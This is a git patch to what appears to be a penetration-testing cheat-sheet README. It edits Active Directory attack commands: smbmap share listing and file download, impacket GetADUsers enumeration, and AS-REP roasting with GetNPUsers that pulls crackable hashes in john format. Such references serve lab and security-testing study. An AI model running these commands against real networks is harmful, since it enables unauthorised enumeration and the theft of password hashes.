From 66be963dd3a8903b45a17cef14868a72bcbe9861 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Tue, 6 Sep 2022 10:32:16 -0400
Subject: [PATCH] Update README.md

---
 README.md | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index ef5b6eb..7332cbd 100644
--- a/README.md
+++ b/README.md
@@ -486,7 +486,7 @@ ldapsearch -H ldap://{IP ADDRESS} -x -b "{DC NAMING CONTEXT}" '(objectClass=Pers
 smbmap -H {IP ADDRESS}
 
 # Recursively show all readable files and shares
-smbmap -R {SHARE} -H {IP ADDRESS}
+smbmap -R {SHARE} -H {IP ADDRESS} --depth 10
 
 # Download a file with smbmap
 smbmap -R {SHARE} -H {IP ADDRESS} -A {FILE} -q
@@ -663,10 +663,13 @@ net user {USERNAME} /domain
 # Enumerate all groups in domain
 net group /domain
 
-# ASREP ROAST
-python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
+# Get Active Directory Users
+python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS}
 
-python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
+# ASREP ROAST
+python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
+
+python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
 # Bloodhound
 sudo neo4j console
 # LHOST